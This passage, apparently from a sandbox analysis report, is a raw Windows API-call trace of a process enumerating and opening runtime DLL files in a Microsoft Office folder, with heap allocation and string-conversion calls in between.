hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0099.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.832] AreFileApisANSI () returned 1 [0099.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 82 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.833] AreFileApisANSI () returned 1 [0099.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f2c8 [0099.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 82 [0099.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.833] GetFileType (hFile=0x368) returned 0x1 [0099.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.833] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.833] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.833] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.834] CloseHandle (hObject=0x368) returned 1 [0099.834] AreFileApisANSI () returned 1 [0099.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f008 [0099.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f008, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 82 [0099.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.834] GetFileType (hFile=0x368) returned 0x1 [0099.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0099.834] CloseHandle (hObject=0x368) returned 1 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.835] AreFileApisANSI () returned 1 [0099.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f798 [0099.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 82 [0099.835] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1006983, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1006983, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1242d5d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x68c0)) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.836] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0f9426a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0f9426a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd121c9ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0099.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0099.837] AreFileApisANSI () returned 1 [0099.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 80 [0099.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.837] AreFileApisANSI () returned 1 [0099.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll") returned 80 [0099.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.837] GetFileType (hFile=0x368) returned 0x1 [0099.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.837] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.838] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.838] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.838] CloseHandle (hObject=0x368) returned 1 [0099.838] AreFileApisANSI () returned 1 [0099.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0099.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll") returned 80 [0099.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.838] GetFileType (hFile=0x368) returned 0x1 [0099.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.838] CloseHandle (hObject=0x368) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.839] AreFileApisANSI () returned 1 [0099.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0099.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c848, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll") returned 80 [0099.840] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0f9426a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0f9426a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd121c9ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x114c0)) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.840] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0f9426a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0f9426a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd139a18a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="APFCAD~1.DLL")) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0099.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.840] 